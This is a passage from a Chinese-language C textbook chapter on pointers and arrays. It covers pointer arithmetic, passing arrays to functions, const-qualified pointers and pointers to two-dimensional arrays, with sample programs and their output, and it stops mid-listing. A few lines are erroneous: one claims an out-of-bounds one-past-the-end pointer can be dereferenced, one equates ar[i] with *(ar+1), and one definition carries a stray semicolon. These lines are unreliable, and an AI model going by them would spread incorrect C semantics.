我们的系统中,地址按字节编址,short类型占用2字节,double类型占 用8字节。在C中,指针加1指的是增加一个存储单元。对数组而言,这意味 着把加1后的地址是下一个元素的地址,而不是下一个字节的地址(见图 10.3)。这是为什么必须声明指针所指向对象类型的原因之一。只知道地址 不够,因为计算机要知道储存对象需要多少字节(即使指针指向的是标量变 量,也要知道变量的类型,否则*pt 就无法正确地取回地址上的值)。 图10.3 数组和指针加法 现在可以更清楚地定义指向int的指针、指向float的指针,以及指向其他 数据对象的指针。 指针的值是它所指向对象的地址。地址的表示方式依赖于计算机内部的 669 硬件。许多计算机(包括PC和Macintosh)都是按字节编址,意思是内存中 的每个字节都按顺序编号。这里,一个较大对象的地址(如double类型的变 量)通常是该对象第一个字节的地址。 在指针前面使用*运算符可以得到该指针所指向对象的值。 指针加1,指针的值递增它所指向类型的大小(以字节为单位)。 下面的等式体现了C语言的灵活性: dates + 2 == &date[2]    // 相同的地址 *(dates + 2) == dates[2]  // 相同的值 以上关系表明了数组和指针的关系十分密切,可以使用指针标识数组的 元素和获得元素的值。从本质上看,同一个对象有两种表示法。实际上,C 语言标准在描述数组表示法时确实借助了指针。也就是说,定义ar[n]的意思 是*(ar + n)。可以认为*(ar + n)的意思是“到内存的ar位置,然后移动n个单 元,检索储存在那里的值”。 顺带一提,不要混淆 *(dates+2)和*dates+2。间接运算符(*)的优先级 高于+,所以*dates+2相当于(*dates)+2: *(dates + 2) // dates第3个元素的值 *dates + 2  // dates第1个元素的值加2 明白了数组和指针的关系,便可在编写程序时适时使用数组表示法或指 针表示法。运行程序清单 10.9后输出的结果和程序清单10.1输出的结果相 同。 程序清单10.9 day_mon3.c程序 /* day_mon3.c -- uses pointer notation */ 670 #include <stdio.h> #define MONTHS 12 int main(void) { int days[MONTHS] = { 31, 28, 31, 30, 31, 30, 31, 31,  30, 31, 30, 31 }; int index; for (index = 0; index < MONTHS; index++) printf("Month %2d has %d days.\n", index + 1, *(days + index)); //与 days[index]相同 return 0; } 这里,days是数组首元素的地址,days + index是元素days[index]的地 址,而*(days + index)则是该元素的值,相当于days[index]。for循环依次引用 数组中的每个元素,并打印各元素的内容。 这样编写程序是否有优势?不一定。编译器编译这两种写法生成的代码 相同。程序清单 10.9 要注意的是,指针表示法和数组表示法是两种等效的 方法。该例演示了可以用指针表示数组,反过来,也可以用数组表示指针。 在使用以数组为参数的函数时要注意这点。 671 10.4 函数、数组和指针 假设要编写一个处理数组的函数,该函数返回数组中所有元素之和,待 处理的是名为marbles的int类型数组。应该如何调用该函数?也许是下面这 样: total = sum(marbles); // 可能的函数调用 那么,该函数的原型是什么?记住,数组名是该数组首元素的地址,所 以实际参数marbles是一个储存int类型值的地址,应把它赋给一个指针形式 参数,即该形参是一个指向int的指针: int sum(int * ar); // 对应的函数原型 sum()从该参数获得了什么信息?它获得了该数组首元素的地址,知道 要在该位置上找出一个整数。注意,该参数并未包含数组元素个数的信息。 我们有两种方法让函数获得这一信息。第一种方法是,在函数代码中写上固 定的数组大小: int sum(int * ar) // 相应的函数定义 { int i; int total = 0; for (i = 0; i < 10; i++)  // 假设数组有10个元素 total += ar[i];    // ar[i] 与 *(ar + i) 相同 return total; } 672 既然能使用指针表示数组名,也可以用数组名表示指针。另外,回忆一 下,+=运算符把右侧运算对象加到左侧运算对象上。因此,total是当前数组 元素之和。 该函数定义有限制,只能计算10个int类型的元素。另一个比较灵活的方 法是把数组大小作为第2个参数: int sum(int * ar, int n)    // 更通用的方法 { int i; int total = 0; for (i = 0; i < n; i++)   // 使用 n 个元素 total += ar[i];    // ar[i] 和 *(ar + i) 相同 return total; } 这里,第1个形参告诉函数该数组的地址和数据类型,第2个形参告诉函 数该数组中元素的个数。 关于函数的形参,还有一点要注意。只有在函数原型或函数定义头中, 才可以用int ar[]代替int * ar: int sum (int ar[], int n); int *ar形式和int ar[]形式都表示ar是一个指向int的指针。但是,int ar[]只 能用于声明形式参数。第2种形式(int ar[])提醒读者指针ar指向的不仅仅 一个int类型值,还是一个int类型数组的元素。 注意 声明数组形参 673 因为数组名是该数组首元素的地址,作为实际参数的数组名要求形式参 数是一个与之匹配的指针。只有在这种情况下,C才会把int ar[]和int * ar解 释成一样。也就是说,ar是指向int的指针。由于函数原型可以省略参数名, 所以下面4种原型都是等价的: int sum(int *ar, int n); int sum(int *, int); int sum(int ar[], int n); int sum(int [], int); 但是,在函数定义中不能省略参数名。下面两种形式的函数定义等价: int sum(int *ar, int n) { // 其他代码已省略 } int sum(int ar[], int n); { //其他代码已省略 } 可以使用以上提到的任意一种函数原型和函数定义。 程序清单 10.10 演示了一个程序,使用 sum()函数。该程序打印原始数 组的大小和表示该数组的函数形参的大小(如果你的编译器不支持用转换说 明%zd打印sizeof返回值,可以用%u或%lu来代替)。 674 程序清单10.10 sum_arr1.c程序 // sum_arr1.c -- 数组元素之和 // 如果编译器不支持 %zd,用 %u 或 %lu 替换它 #include <stdio.h> #define SIZE 10 int sum(int ar[], int n); int main(void) { int marbles[SIZE] = { 20, 10, 5, 39, 4, 16, 19, 26,  31, 20 }; long answer; answer = sum(marbles, SIZE); printf("The total number of marbles is %ld.\n", answer); printf("The size of marbles is %zd bytes.\n", sizeof marbles); return 0; } int sum(int ar[], int n)   // 这个数组的大小是? 
{ 675 int i; int total = 0; for (i = 0; i < n; i++) total += ar[i]; printf("The size of ar is %zd bytes.\n", sizeof ar); return total; } 该程序的输出如下: The size of ar is 8 bytes. The total number of marbles is 190. The size of marbles is 40 bytes. 注意,marbles的大小是40字节。这没问题,因为marbles内含10个int类 型的值,每个值占4字节,所以整个marbles的大小是40字节。但是,ar才8字 节。这是因为ar并不是数组本身,它是一个指向 marbles 数组首元素的指 针。我们的系统中用 8 字节储存地址,所以指针变量的大小是 8字节(其他 系统中地址的大小可能不是8字节)。简而言之,在程序清单10.10中, marbles是一个数组, ar是一个指向marbles数组首元素的指针,利用C中数组 和指针的特殊关系,可以用数组表示法来表示指针ar。 10.4.1 使用指针形参 函数要处理数组必须知道何时开始、何时结束。sum()函数使用一个指 针形参标识数组的开始,用一个整数形参表明待处理数组的元素个数(指针 形参也表明了数组中的数据类型)。但是这并不是给函数传递必备信息的唯 676 一方法。还有一种方法是传递两个指针,第1个指针指明数组的开始处(与 前面用法相同),第2个指针指明数组的结束处。程序清单10.11演示了这种 方法,同时该程序也表明了指针形参是变量,这意味着可以用索引表明访问 数组中的哪一个元素。 程序清单10.11 sum_arr2.c程序 /* sum_arr2.c -- 数组元素之和 */ #include <stdio.h> #define SIZE 10 int sump(int * start, int * end); int main(void) { int marbles[SIZE] = { 20, 10, 5, 39, 4, 16, 19, 26,  31, 20 }; long answer; answer = sump(marbles, marbles + SIZE); printf("The total number of marbles is %ld.\n", answer); return 0; } /* 使用指针算法 */ int sump(int * start, int * end) 677 { int total = 0; while (start < end) { total += *start;  // 把数组元素的值加起来 start++;      // 让指针指向下一个元素 } return total; } 指针start开始指向marbles数组的首元素,所以赋值表达式total += *start 把首元素(20)加给total。然后,表达式start++递增指针变量start,使其指 向数组的下一个元素。因为start是指向int的指针,start递增1相当于其值递增 int类型的大小。 注意,sump()函数用另一种方法结束加法循环。sum()函数把元素的个数 作为第2个参数,并把该参数作为循环测试的一部分: for( i = 0; i < n; i++) 而sump()函数则使用第2个指针来结束循环: while (start < end) 因为while循环的测试条件是一个不相等的关系,所以循环最后处理的 一个元素是end所指向位置的前一个元素。这意味着end指向的位置实际上在 数组最后一个元素的后面。C保证在给数组分配空间时,指向数组后面第一 个位置的指针仍是有效的指针。这使得 while循环的测试条件是有效的,因 678 为 start在循环中最后的值是end[1]。注意,使用这种“越界”指针的函数调用 更为简洁: answer = sump(marbles, marbles + SIZE); 因为下标从0开始,所以marbles + SIZE指向数组末尾的下一个位置。如 果end指向数组的最后一个元素而不是数组末尾的下一个位置,则必须使用 下面的代码: answer = sump(marbles, marbles + SIZE - 1); 这种写法既不简洁也不好记,很容易导致编程错误。顺带一提,虽然C 保证了marbles + SIZE有效,但是对marbles[SIZE](即储存在该位置上的 值)未作任何保证,所以程序不能访问该位置。 还可以把循环体压缩成一行代码: total += *start++; 一元运算符*和++的优先级相同,但结合律是从右往左,所以start++先 求值,然后才是*start。也就是说,指针start先递增后指向。使用后缀形式 (即start++而不是++start)意味着先把指针指向位置上的值加到total上,然 后再递增指针。如果使用*++start,顺序则反过来,先递增指针,再使用指 针指向位置上的值。如果使用(*start)++,则先使用start指向的值,再递增该 值,而不是递增指针。这样,指针将一直指向同一个位置,但是该位置上的 值发生了变化。虽然*start++的写法比较常用,但是*(start++)这样写更清 楚。程序清单10.12的程序演示了这些优先级的情况。 程序清单10.12 order.c程序 /* order.c -- 指针运算中的优先级 */ #include <stdio.h> int data[2] = { 100, 200 }; 679 int moredata[2] = { 300, 400 }; int main(void) { int * p1, *p2, *p3; p1 = p2 = data; p3 = moredata; printf(" *p1 = %d,  *p2 = %d,  *p3 = %d\n",*p1, *p2, *p3); printf("*p1++ = %d, *++p2 = %d, (*p3)++ = %d\n",*p1++, *++p2, (*p3)++); printf(" *p1 = %d,  *p2 = %d,  *p3 = %d\n",*p1, *p2, *p3); return 0; } 下面是该程序的输出: *p1 = 100,  *p2 = 100,   *p3 = 300 *p1++ = 100, *++p2 = 200, (*p3)++ = 300 *p1 = 200,  *p2 = 200,   *p3 = 301 只有(*p3)++改变了数组元素的值,其他两个操作分别把p1和p2指向数 组的下一个元素。 10.4.2 指针表示法和数组表示法 从以上分析可知,处理数组的函数实际上用指针作为参数,但是在编写 这样的函数时,可以选择是使用数组表示法还是指针表示法。如程序清单 680 10.10所示,使用数组表示法,让函数是处理数组的这一意图更加明显。另 外,许多其他语言的程序员对数组表示法更熟悉,如FORTRAN、Pascal、 Modula-2或BASIC。其他程序员可能更习惯使用指针表示法,觉得使用指针 更自然,如程序清单10.11所示。 至于C语言,ar[i]和*(ar+1)这两个表达式都是等价的。无论ar是数组名 还是指针变量,这两个表达式都没问题。但是,只有当ar是指针变量时,才 能使用ar++这样的表达式。 指针表示法(尤其与递增运算符一起使用时)更接近机器语言,因此一 些编译器在编译时能生成效率更高的代码。然而,许多程序员认为他们的主 要任务是确保代码正确、逻辑清晰,而代码优化应该留给编译器去做。 681 10.5 指针操作 可以对指针进行哪些操作?C提供了一些基本的指针操作,下面的程序 示例中演示了8种不同的操作。为了显示每种操作的结果,该程序打印了指 针的值(该指针指向的地址)、储存在指针指向地址上的值,以及指针自己 的地址。如果编译器不支持%p 转换说明,可以用%u 或%lu 代替%p;如果 编译器不支持用%td转换说明打印地址的差值,可以用%d或%ld来代替。 程序清单10.13演示了指针变量的 8种基本操作。除了这些操作,还可以 使用关系运算符来比较指针。 程序清单10.13 ptr_ops.c程序 // 
ptr_ops.c -- 指针操作 #include <stdio.h> int main(void) { int urn[5] = { 100, 200, 300, 400, 500 }; int * ptr1, *ptr2, *ptr3; ptr1 = urn;       // 把一个地址赋给指针 ptr2 = &urn[2];     // 把一个地址赋给指针 // 解引用指针,以及获得指针的地址 printf("pointer value, dereferenced pointer, pointer address:\n"); printf("ptr1 = %p, *ptr1 =%d, &ptr1 = %p\n", ptr1, *ptr1, &ptr1); // 指针加法 682 ptr3 = ptr1 + 4; printf("\nadding an int to a pointer:\n"); printf("ptr1 + 4 = %p, *(ptr1 + 4) = %d\n", ptr1 + 4, *(ptr1 + 4)); ptr1++;         // 递增指针 printf("\nvalues after ptr1++:\n"); printf("ptr1 = %p, *ptr1 =%d, &ptr1 = %p\n", ptr1, *ptr1, &ptr1); ptr2--;         // 递减指针 printf("\nvalues after --ptr2:\n"); printf("ptr2 = %p, *ptr2 = %d, &ptr2 = %p\n", ptr2, *ptr2, &ptr2); --ptr1;         // 恢复为初始值 ++ptr2;         // 恢复为初始值 printf("\nPointers reset to original values:\n"); printf("ptr1 = %p, ptr2 = %p\n", ptr1, ptr2); // 一个指针减去另一个指针 printf("\nsubtracting one pointer from another:\n"); printf("ptr2 = %p, ptr1 = %p, ptr2 - ptr1 = %td\n",  ptr2, ptr1, ptr2 - ptr1); // 一个指针减去一个整数 printf("\nsubtracting an int from a pointer:\n"); 683 printf("ptr3 = %p, ptr3 - 2 = %p\n", ptr3, ptr3 - 2); return 0; } 下面是我们的系统运行该程序后的输出: pointer value, dereferenced pointer, pointer address: ptr1 = 0x7fff5fbff8d0, *ptr1 =100, &ptr1 = 0x7fff5fbff8c8 adding an int to a pointer: ptr1 + 4 = 0x7fff5fbff8e0, *(ptr1 + 4) = 500 values after ptr1++: ptr1 = 0x7fff5fbff8d4, *ptr1 =200, &ptr1 = 0x7fff5fbff8c8 values after --ptr2: ptr2 = 0x7fff5fbff8d4, *ptr2 = 200, &ptr2 = 0x7fff5fbff8c0 Pointers reset to original values: ptr1 = 0x7fff5fbff8d0, ptr2 = 0x7fff5fbff8d8 subtracting one pointer from another: ptr2 = 0x7fff5fbff8d8, ptr1 = 0x7fff5fbff8d0, ptr2 - ptr1 = 2 subtracting an int from a pointer: ptr3 = 0x7fff5fbff8e0, ptr3 - 2 = 0x7fff5fbff8d8 下面分别描述了指针变量的基本操作。 684 赋值:可以把地址赋给指针。例如,用数组名、带地址运算符(&)的 变量名、另一个指针进行赋值。在该例中,把urn数组的首地址赋给了ptr1, 该地址的编号恰好是0x7fff5fbff8d0。变量ptr2获得数组urn的第3个元素 (urn[2])的地址。注意,地址应该和指针类型兼容。也就是说,不能把 double类型的地址赋给指向int的指针,至少要避免不明智的类型转换。 C99/C11已经强制不允许这样做。 解引用:*运算符给出指针指向地址上储存的值。因此,*ptr1的初值是 100,该值储存在编号为0x7fff5fbff8d0的地址上。 取址:和所有变量一样,指针变量也有自己的地址和值。对指针而言, &运算符给出指针本身的地址。本例中,ptr1 储存在内存编号为 0x7fff5fbff8c8 的地址上,该存储单元储存的内容是0x7fff5fbff8d0,即urn的地 址。因此&ptr1是指向ptr1的指针,而ptr1是指向utn[0]的指针。 指针与整数相加:可以使用+运算符把指针与整数相加,或整数与指针 相加。无论哪种情况,整数都会和指针所指向类型的大小(以字节为单位) 相乘,然后把结果与初始地址相加。因此ptr1 +4与&urn[4]等价。如果相加 的结果超出了初始指针指向的数组范围,计算结果则是未定义的。除非正好 超过数组末尾第一个位置,C保证该指针有效。 递增指针:递增指向数组元素的指针可以让该指针移动至数组的下一个 元素。因此,ptr1++相当于把ptr1的值加上4(我们的系统中int为4字节), ptr1指向urn[1](见图10.4,该图中使用了简化的地址)。现在ptr1的值是 0x7fff5fbff8d4(数组的下一个元素的地址),*ptr的值为200(即urn[1]的 值)。注意,ptr1本身的地址仍是 0x7fff5fbff8c8。毕竟,变量不会因为值发 生变化就移动位置。 685 图10.4 递增指向int的指针 指针减去一个整数:可以使用-运算符从一个指针中减去一个整数。指 针必须是第1个运算对象,整数是第 2 个运算对象。该整数将乘以指针指向 类型的大小(以字节为单位),然后用初始地址减去乘积。所以ptr3 - 2与 &urn[2]等价,因为ptr3指向的是&arn[4]。如果相减的结果超出了初始指针所 指向数组的范围,计算结果则是未定义的。除非正好超过数组末尾第一个位 置,C保证该指针有效。 递减指针:当然,除了递增指针还可以递减指针。在本例中,递减ptr3 使其指向数组的第2个元素而不是第3个元素。前缀或后缀的递增和递减运算 符都可以使用。注意,在重置ptr1和ptr2前,它们都指向相同的元素urn[1]。 指针求差:可以计算两个指针的差值。通常,求差的两个指针分别指向 同一个数组的不同元素,通过计算求出两元素之间的距离。差值的单位与数 组类型的单位相同。例如,程序清单10.13的输出中,ptr2 - ptr1得2,意思是 这两个指针所指向的两个元素相隔两个int,而不是2字节。只要两个指针都 指向相同的数组(或者其中一个指针指向数组后面的第 1 个地址),C 都能 保证相减运算有效。如果指向两个不同数组的指针进行求差运算可能会得出 一个值,或者导致运行时错误。 比较:使用关系运算符可以比较两个指针的值,前提是两个指针都指向 686 相同类型的对象。 注意,这里的减法有两种。可以用一个指针减去另一个指针得到一个整 数,或者用一个指针减去一个整数得到另一个指针。 在递增或递减指针时还要注意一些问题。编译器不会检查指针是否仍指 向数组元素。C 只能保证指向数组任意元素的指针和指向数组后面第 1 个位 置的指针有效。但是,如果递增或递减一个指针后超出了这个范围,则是未 定义的。另外,可以解引用指向数组任意元素的指针。但是,即使指针指向 数组后面一个位置是有效的,也能解引用这样的越界指针。 解引用未初始化的指针 说到注意事项,一定要牢记一点:千万不要解引用未初始化的指针。例 如,考虑下面的例子: int * pt;// 未初始化的指针 *pt = 5;   // 严重的错误 
为何不行?第2行的意思是把5储存在pt指向的位置。但是pt未被初始 化,其值是一个随机值,所以不知道5将储存在何处。这可能不会出什么 错,也可能会擦写数据或代码,或者导致程序崩溃。切记:创建一个指针 时,系统只分配了储存指针本身的内存,并未分配储存数据的内存。因此, 在使用指针之前,必须先用已分配的地址初始化它。例如,可以用一个现有 变量的地址初始化该指针(使用带指针形参的函数时,就属于这种情况)。 或者还可以使用第12章将介绍的malloc()函数先分配内存。无论如何,使用 指针时一定要注意,不要解引用未初始化的指针! double * pd; // 未初始化的指针 *pd = 2.4;  // 不要这样做 假设 687 int urn[3]; int * ptr1, * ptr2; 下面是一些有效和无效的语句: 有效语句          无效语句 ptr1++;             urn++; ptr2 = ptr1 + 2;      ptr2 = ptr2 + ptr1; ptr2 = urn + 1;       ptr2 = urn * ptr1; 基于这些有效的操作,C 程序员创建了指针数组、函数指针、指向指针 的指针数组、指向函数的指针数组等。别紧张,接下来我们将根据已学的内 容介绍指针的一些基本用法。指针的第 1 个基本用法是在函数间传递信息。 前面学过,如果希望在被调函数中改变主调函数的变量,必须使用指针。指 针的第 2 个基本用法是用在处理数组的函数中。下面我们再来看一个使用函 数和数组的编程示例。 688 10.6 保护数组中的数据 编写一个处理基本类型(如,int)的函数时,要选择是传递int类型的值 还是传递指向int的指针。通常都是直接传递数值,只有程序需要在函数中改 变该数值时,才会传递指针。对于数组别无选择,必须传递指针,因为这样 做效率高。如果一个函数按值传递数组,则必须分配足够的空间来储存原数 组的副本,然后把原数组所有的数据拷贝至新的数组中。如果把数组的地址 传递给函数,让函数直接处理原数组则效率要高。 传递地址会导致一些问题。C 通常都按值传递数据,因为这样做可以保 证数据的完整性。如果函数使用的是原始数据的副本,就不会意外修改原始 数据。但是,处理数组的函数通常都需要使用原始数据,因此这样的函数可 以修改原数组。有时,这正是我们需要的。例如,下面的函数给数组的每个 元素都加上一个相同的值: void add_to(double ar[], int n, double val) { int i; for (i = 0; i < n; i++) ar[i] += val; } 因此,调用该函数后,prices数组中的每个元素的值都增加了2.5: add_to(prices, 100, 2.50); 该函数修改了数组中的数据。之所以可以这样做,是因为函数通过指针 直接使用了原始数据。 689 然而,其他函数并不需要修改数据。例如,下面的函数计算数组中所有 元素之和,它不用改变数组的数据。但是,由于ar实际上是一个指针,所以 编程错误可能会破坏原始数据。例如,下面示例中的ar[i]++会导致数组中每 个元素的值都加1: int sum(int ar[], int n) // 错误的代码 { int i; int total = 0; for( i = 0; i < n; i++) total += ar[i]++; // 错误递增了每个元素的值 return total; } 10.6.1 对形式参数使用const 在K&R C的年代,避免类似错误的唯一方法是提高警惕。ANSI C提供 了一种预防手段。如果函数的意图不是修改数组中的数据内容,那么在函数 原型和函数定义中声明形式参数时应使用关键字const。例如,sum()函数的 原型和定义如下: int sum(const int ar[], int n); /* 函数原型 */ int sum(const int ar[], int n) /* 函数定义 */ { int i; 690 int total = 0; for( i = 0; i < n; i++) total += ar[i]; return total; } 以上代码中的const告诉编译器,该函数不能修改ar指向的数组中的内 容。如果在函数中不小心使用类似ar[i]++的表达式,编译器会捕获这个错 误,并生成一条错误信息。 这里一定要理解,这样使用const并不是要求原数组是常量,而是该函 数在处理数组时将其视为常量,不可更改。这样使用const可以保护数组的 数据不被修改,就像按值传递可以保护基本数据类型的原始值不被改变一 样。一般而言,如果编写的函数需要修改数组,在声明数组形参时则不使用 const;如果编写的函数不用修改数组,那么在声明数组形参时最好使用 const。 程序清单10.14的程序中,一个函数显示数组的内容,另一个函数给数 组每个元素都乘以一个给定值。因为第1个函数不用改变数组,所以在声明 数组形参时使用了const;而第2个函数需要修改数组元素的值,所以不使用 const。 程序清单10.14 arf.c程序 /* arf.c -- 处理数组的函数 */ #include <stdio.h> #define SIZE 5 void show_array(const double ar[], int n); 691 void mult_array(double ar[], int n, double mult); int main(void) { double dip[SIZE] = { 20.0, 17.66, 8.2, 15.3, 22.22 }; printf("The original dip array:\n"); show_array(dip, SIZE); mult_array(dip, SIZE, 2.5); printf("The dip array after calling mult_array():\n"); show_array(dip, SIZE); return 0; } /* 显示数组的内容 */ void show_array(const double ar[], int n) { int i; for (i = 0; i < n; i++) printf("%8.3f ", ar[i]); putchar('\n'); } 692 /* 把数组的每个元素都乘以相同的值 */ void mult_array(double ar[], int n, double mult) { int i; for (i = 0; i < n; i++) ar[i] *= mult; } 下面是该程序的输出: The original dip array: 20.000  17.660   8.200   15.300  22.220 The dip array after calling mult_array(): 50.000  44.150   20.500  38.250  55.550 注意该程序中两个函数的返回类型都是void。虽然mult_array()函数更新 了dip数组的值,但是并未使用return机制。 10.6.2 const的其他内容 我们在前面使用const创建过变量: const double PI = 3.14159; 虽然用#define指令可以创建类似功能的符号常量,但是const的用法更加 灵活。可以创建const数组、const指针和指向const的指针。 程序清单10.4演示了如何使用const关键字保护数组: 693 #define MONTHS 12 ... 
const int days[MONTHS] = {31,28,31,30,31,30,31,31,30,31,30,31}; 如果程序稍后尝试改变数组元素的值,编译器将生成一个编译期错误消 息: days[9] = 44;   /* 编译错误 */ 指向const的指针不能用于改变值。考虑下面的代码: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; const double * pd = rates;   // pd指向数组的首元素 第2行代码把pd指向的double类型的值声明为const,这表明不能使用pd 来更改它所指向的值: *pd = 29.89;   // 不允许 pd[2] = 222.22;  //不允许 rates[0] = 99.99; // 允许,因为rates未被const限定 无论是使用指针表示法还是数组表示法,都不允许使用pd修改它所指向 数据的值。但是要注意,因为rates并未被声明为const,所以仍然可以通过 rates修改元素的值。另外,可以让pd指向别处: pd++; /* 让pd指向rates[1] -- 没问题 */ 指向 const 的指针通常用于函数形参中,表明该函数不会使用指针改变 数据。例如,程序清单 10.14中的show_array()函数原型如下: void show_array(const double *ar, int n); 694 关于指针赋值和const需要注意一些规则。首先,把const数据或非const 数据的地址初始化为指向const的指针或为其赋值是合法的: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; const double locked[4] = {0.08, 0.075, 0.0725, 0.07}; const double * pc = rates; // 有效 pc = locked;         //有效 pc = &rates[3];       //有效 然而,只能把非const数据的地址赋给普通指针: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; const double locked[4] = {0.08, 0.075, 0.0725, 0.07}; double * pnc = rates; // 有效 pnc = locked;      // 无效 pnc = &rates[3];    // 有效 这个规则非常合理。否则,通过指针就能改变const数组中的数据。 应用以上规则的例子,如 show_array()函数可以接受普通数组名和 const 数组名作为参数,因为这两种参数都可以用来初始化指向const的指针: show_array(rates, 5);    // 有效 show_array(locked, 4);   // 有效 因此,对函数的形参使用const不仅能保护数据,还能让函数处理const 数组。 695 另外,不应该把const数组名作为实参传递给mult_array()这样的函数: mult_array(rates, 5, 1.2);   // 有效 mult_array(locked, 4, 1.2);   // 不要这样做 C标准规定,使用非const标识符(如,mult_arry()的形参ar)修改const 数据(如,locked)导致的结果是未定义的。 const还有其他的用法。例如,可以声明并初始化一个不能指向别处的 指针,关键是const的位置: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; double * const pc = rates; // pc指向数组的开始 pc = &rates[2];       // 不允许,因为该指针不能指向别处 *pc = 92.99;        // 没问题 -- 更改rates[0]的值 可以用这种指针修改它所指向的值,但是它只能指向初始化时设置的地 址。 最后,在创建指针时还可以使用const两次,该指针既不能更改它所指 向的地址,也不能修改指向地址上的值: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; const double * const pc = rates; pc = &rates[2];  //不允许 *pc = 92.99;   //不允许 696 10.7 指针和多维数组 指针和多维数组有什么关系?为什么要了解它们的关系?处理多维数组 的函数要用到指针,所以在使用这种函数之前,先要更深入地学习指针。至 于第 1 个问题,我们通过几个示例来回答。为简化讨论,我们使用较小的数 组。假设有下面的声明: int zippo[4][2]; /* 内含int数组的数组 */ 然后数组名zippo是该数组首元素的地址。在本例中,zippo的首元素是 一个内含两个int值的数组,所以zippo是这个内含两个int值的数组的地址。 下面,我们从指针的属性进一步分析。 因为zippo是数组首元素的地址,所以zippo的值和&zippo[0]的值相同。 而zippo[0]本身是一个内含两个整数的数组,所以zippo[0]的值和它首元素 (一个整数)的地址(即&zippo[0][0]的值)相同。简而言之,zippo[0]是一 个占用一个int大小对象的地址,而zippo是一个占用两个int大小对象的地 址。由于这个整数和内含两个整数的数组都开始于同一个地址,所以zippo 和zippo[0]的值相同。 给指针或地址加1,其值会增加对应类型大小的数值。在这方面,zippo 和zippo[0]不同,因为zippo指向的对象占用了两个int大小,而zippo[0]指向的 对象只占用一个int大小。因此, zippo + 1和zippo[0] + 1的值不同。 解引用一个指针(在指针前使用*运算符)或在数组名后使用带下标的 []运算符,得到引用对象代表的值。因为zippo[0]是该数组首元素(zippo[0] [0])的地址,所以*(zippo[0])表示储存在zippo[0][0]上的值(即一个int类型 的值)。与此类似,*zippo代表该数组首元素(zippo[0])的值,但是 zippo[0]本身是一个int类型值的地址。该值的地址是&zippo[0][0],所以 *zippo就是&zippo[0][0]。对两个表达式应用解引用运算符表明,**zippo与 *&zippo[0][0]等价,这相当于zippo[0][0],即一个int类型的值。简而言之, zippo是地址的地址,必须解引用两次才能获得原始值。地址的地址或指针 697 的指针是就是双重间接(double indirection)的例子。 显然,增加数组维数会增加指针的复杂度。现在,大部分初学者都开始 意识到指针为什么是 C 语言中最难的部分。认真思考上述内容,看看是否 能用所学的知识解释程序清单10.15中的程序。该程序显示了一些地址值和 数组的内容。 程序清单10.15 zippo1.c程序 /* zippo1.c -- zippo的相关信息 */ #include <stdio.h> int main(void) { int zippo[4][2] = { { 2, 4 }, { 6, 8 }, { 1, 3 },  { 5, 7 } }; printf("  zippo = %p,   zippo + 1 = %p\n",zippo, zippo  + 1); printf("zippo[0] = %p, zippo[0] + 1 = %p\n",zippo[0],  zippo[0] + 1); printf(" *zippo = %p,  *zippo + 1 = %p\n",*zippo, *zippo + 1); printf("zippo[0][0] = %d\n", zippo[0][0]); printf(" *zippo[0] = %d\n", *zippo[0]); printf("  **zippo = %d\n", **zippo); printf("    
zippo[2][1] = %d\n", zippo[2][1]); 698 printf("*(*(zippo+2) + 1) = %d\n", *(*(zippo + 2) + 1)); return 0; } 下面是我们的系统运行该程序后的输出: zippo = 0x0064fd38,     zippo + 1 = 0x0064fd40 zippo[0]= 0x0064fd38,  zippo[0] + 1 = 0x0064fd3c *zippo = 0x0064fd38,   *zippo + 1 = 0x0064fd3c zippo[0][0] = 2 *zippo[0] = 2 **zippo = 2 zippo[2][1] = 3 *(*(zippo+2) + 1) = 3 其他系统显示的地址值和地址形式可能不同,但是地址之间的关系与以 上输出相同。该输出显示了二维数组zippo的地址和一维数组zippo[0]的地址 相同。它们的地址都是各自数组首元素的地址,因而与&zippo[0][0]的值也 相同。 尽管如此,它们也有差别。在我们的系统中,int是4 字节。前面讨论 过,zippo[0]指向一个4 字节的数据对象。zippo[0]加1,其值加4(十六进制 中,38+4得3c)。数组名zippo 是一个内含2个int类型值的数组的地址,所以 zippo指向一个8字节的数据对象。因此,zippo加1,它所指向的地址加8字节 (十六进制中,38+8得40)。 该程序演示了zippo[0]和*zippo完全相同,实际上确实如此。然后,对 699 二维数组名解引用两次,得到储存在数组中的值。使用两个间接运算符 (*)或者使用两对方括号([])都能获得该值(还可以使用一个*和一对 [],但是我们暂不讨论这么多情况)。 要特别注意,与 zippo[2][1]等价的指针表示法是*(*(zippo+2) + 1)。看上 去比较复杂,应最好能理解。下面列出了理解该表达式的思路: 以上分析并不是为了说明用指针表示法(*(*(zippo+2) + 1))代替数组 表示法(zippo[2][1]),而是提示读者,如果程序恰巧使用一个指向二维数 组的指针,而且要通过该指针获取值时,最好用简单的数组表示法,而不是 指针表示法。 图10.5以另一种视图演示了数组地址、数组内容和指针之间的关系。 图10.5 数组的数组 10.7.1 指向多维数组的指针 如何声明一个指针变量pz指向一个二维数组(如,zippo)?在编写处 700 理类似zippo这样的二维数组时会用到这样的指针。把指针声明为指向int的 类型还不够。因为指向int只能与zippo[0]的类型匹配,说明该指针指向一个 int类型的值。但是zippo是它首元素的地址,该元素是一个内含两个int类型 值的一维数组。因此,pz必须指向一个内含两个int类型值的数组,而不是指 向一个int类型值,其声明如下: int (* pz)[2];  // pz指向一个内含两个int类型值的数组 以上代码把pz声明为指向一个数组的指针,该数组内含两个int类型值。 为什么要在声明中使用圆括号?因为[]的优先级高于*。考虑下面的声明: int * pax[2];   // pax是一个内含两个指针元素的数组,每个元素都指 向int的指针 由于[]优先级高,先与pax结合,所以pax成为一个内含两个元素的数 组。然后*表示pax数组内含两个指针。最后,int表示pax数组中的指针都指 向int类型的值。因此,这行代码声明了两个指向int的指针。而前面有圆括号 的版本,*先与pz结合,因此声明的是一个指向数组(内含两个int类型的 值)的指针。程序清单10.16演示了如何使用指向二维数组的指针。 程序清单10.16 zippo2.c程序 /* zippo2.c -- 通过指针获取zippo的信息 */ #include <stdio.h> int main(void) { int zippo[4][2] = { { 2, 4 }, { 6, 8 }, { 1, 3 },  { 5, 7 } }; int(*pz)[2]; 701 pz = zippo; printf("  pz = %p,   pz + 1 = %p\n",   pz, pz + 1); printf("pz[0] = %p, pz[0] + 1 = %p\n",  pz[0], pz[0] + 1); printf(" *pz = %p,  *pz + 1 = %p\n",  *pz, *pz + 1); printf("pz[0][0] = %d\n", pz[0][0]); printf(" *pz[0] 